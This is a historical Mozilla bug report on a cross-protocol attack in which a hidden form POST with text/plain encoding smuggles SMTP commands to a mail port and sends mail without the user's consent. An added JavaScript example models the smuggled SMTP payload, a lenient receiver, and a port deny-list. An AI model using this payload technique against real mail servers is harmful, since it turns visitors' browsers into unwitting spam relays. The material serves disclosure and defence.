Bug 72149 (Closed)
Opened 23 years ago
Closed 23 years ago
Sending mail w/o user's consent using form post
Categories: Core :: Security, defect
People: Reporter: security-bugs, Assigned: gagan
Attachments (1 file): 2.04 KB, text/html
Well, I started to think what sort of bugs we could get using techniques similar to bug 71916 (the gopher security bug). And I came up with the attached. See the notes at the top. If you don't have sendmail 8.11 installed on your target host then you'll have to use port 25 instead of 587. ns4 doesn't work with port 25, so this exploit won't work under ns4 on that port. You have to have the enctype set on the form so that the newlines aren't escaped. I don't want to put this in bugzilla for obvious reasons. Blocking all ports < 1024 apart from the defaults is not a solution - I've seen webservers on 81 occasionally. This can be used to exploit any protocol which will ignore invalid lines. I mentioned this to jag, and he suggested a frame with height=1 so that the user never knows about it. Bradley
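The attack described in the report, as an added example that is not part of the bug or of Mozilla's code: it models the byte stream a browser writes for a form POST aimed at an SMTP port, a lenient SMTP receiver that answers unknown verbs with 500 and carries on with the next line, the difference the enctype makes, and a port deny-list of the kind that closes the hole. Host names, addresses and the contents of the deny-list are constructed for illustration.

```javascript
// Added example, not code from the bug or from Mozilla. Host names, addresses
// and the deny-list contents are constructed placeholders.

const CRLF = "\r\n";

// Encode form fields the way a browser does for each enctype.
// text/plain sends "name=value" per line with the value verbatim, so embedded
// CRLFs survive; application/x-www-form-urlencoded percent-encodes them
// (%0D%0A), collapsing the whole body onto one line (browsers also use "+"
// for spaces, which does not matter here).
function encodeBody(fields, enctype) {
  if (enctype === "text/plain") {
    return fields.map(([name, value]) => `${name}=${value}${CRLF}`).join("");
  }
  return fields
    .map(([name, value]) => `${encodeURIComponent(name)}=${encodeURIComponent(value)}`)
    .join("&");
}

// The bytes a browser writes to host:port for <form method="POST" action=...>.
// It never reads the SMTP greeting; it just writes this blob and waits.
function buildFormPost(host, port, fields, enctype) {
  const body = encodeBody(fields, enctype);
  return [
    "POST / HTTP/1.0",
    `Host: ${host}:${port}`,
    `Content-Type: ${enctype}`,
    `Content-Length: ${body.length}`, // payload is ASCII, so chars == bytes
    "",
    body,
  ].join(CRLF);
}

// A minimal SMTP receiver. A real server replies "500 command not recognized"
// to the HTTP request line and headers and then processes the next line as
// usual; that leniency is what the attack depends on.
const SMTP_VERBS = new Set(["HELO", "EHLO", "MAIL", "RCPT", "DATA", "QUIT"]);

function smtpReceive(stream) {
  const accepted = [];
  const rejected = [];
  const message = [];
  let inData = false;
  for (const line of stream.split(CRLF)) {
    if (inData) {
      if (line === ".") { inData = false; accepted.push("<message>"); }
      else message.push(line);
      continue;
    }
    if (line === "") continue; // empty line: no command to act on
    const verb = line.split(/[ :]/)[0].toUpperCase();
    if (!SMTP_VERBS.has(verb)) { rejected.push(line); continue; }
    accepted.push(line);
    if (verb === "DATA") inData = true;
    if (verb === "QUIT") break;
  }
  return { accepted, rejected, message: message.join(CRLF) };
}

// The attacker's hidden textarea value (constructed). The leading blank line
// ends the "name=" junk so the first real SMTP verb starts its own line.
const PAYLOAD = [
  "",
  "HELO attacker.example",
  "MAIL FROM:<spammer@attacker.example>",
  "RCPT TO:<victim@target.example>",
  "DATA",
  "Subject: sent through your browser",
  "",
  "This left the victim's machine as a form post, not from a mail client.",
  ".",
  "QUIT",
].join(CRLF);

// Post the payload to port 587 with the given enctype; report what the
// receiver acted on and what it threw away.
function deliverViaForm(enctype) {
  const req = buildFormPost("mail.target.example", 587, [["x", PAYLOAD]], enctype);
  return smtpReceive(req);
}

// Mitigation: refuse HTTP connections to ports owned by line-oriented
// protocols instead of every port below 1024 (the report notes legitimate
// web servers on ports such as 81). Illustrative list, not any browser's.
const BLOCKED_PORTS = new Set([25, 110, 119, 143, 587, 6667]);

function formActionAllowed(actionUrl) {
  const u = new URL(actionUrl);
  const port = u.port === "" ? (u.protocol === "https:" ? 443 : 80) : Number(u.port);
  return !BLOCKED_PORTS.has(port);
}

for (const enctype of ["text/plain", "application/x-www-form-urlencoded"]) {
  const r = deliverViaForm(enctype);
  console.log(`${enctype}: ${r.accepted.length} SMTP steps accepted, ${r.rejected.length} lines rejected`);
}
console.log("POST to :587 allowed?", formActionAllowed("http://mail.target.example:587/"));
```

With text/plain the request line, the four headers' worth of lines and the `x=` prefix each draw a 500 and are dropped, and the six SMTP steps behind them run to completion, recipient included. With the default enctype the same payload arrives as a single percent-encoded line and no verb is ever recognised. The deny-list stops the connection before a byte is written, while leaving a web server on port 81 reachable.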
Comment 1•23 years ago
Updated•23 years ago
Status: NEW → ASSIGNED
OS: Windows NT → Linux
Comment 2•23 years ago
This was contributed by bbaetz@cs.mcgill.ca, but he wanted it kept confidential for the time being, which is why I'm filing it.
Status: ASSIGNED → RESOLVED
Closed: 23 years ago
Resolution: --- → FIXED
Comment 3•23 years ago
Okay, I'm using the example, but I'm not sure a) the example is supposed to do anything or b) the fix that is in blocks the unwanted behaviour. Mitch?
Comment 4•23 years ago
Whoops, this isn't fixed. I'm not sure why this was marked fixed. No wonder I couldn't find it... dougt filed a bugscape bug on this, but I'll close that one out in favor of this one, since it belongs in bugzilla. Reopening and reassigning to gagan, since this is a Necko issue.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Updated•23 years ago
Assignee: mstoltz → gagan
Status: REOPENED → NEW
Comment 5•23 years ago
->gagan
Comment 6•23 years ago
The exploit needs a bit of modifying to work (you have to change the mailserver from localhost to judge.mcom.com, and set a valid name for the mail receiver). The bugscape bug is bug 5574. I wanted it confidential because it was exploitable :)
Comment 7•23 years ago
this is a dup of the more active bug *** This bug has been marked as a duplicate of 83401 ***
Status: NEW → RESOLVED
Closed: 23 years ago → 23 years ago
Resolution: --- → DUPLICATE
Comment 9•23 years ago
-nsconf (after discussion with mitch) so that this can be mentioned in a relnote
Group: netscapeconfidential?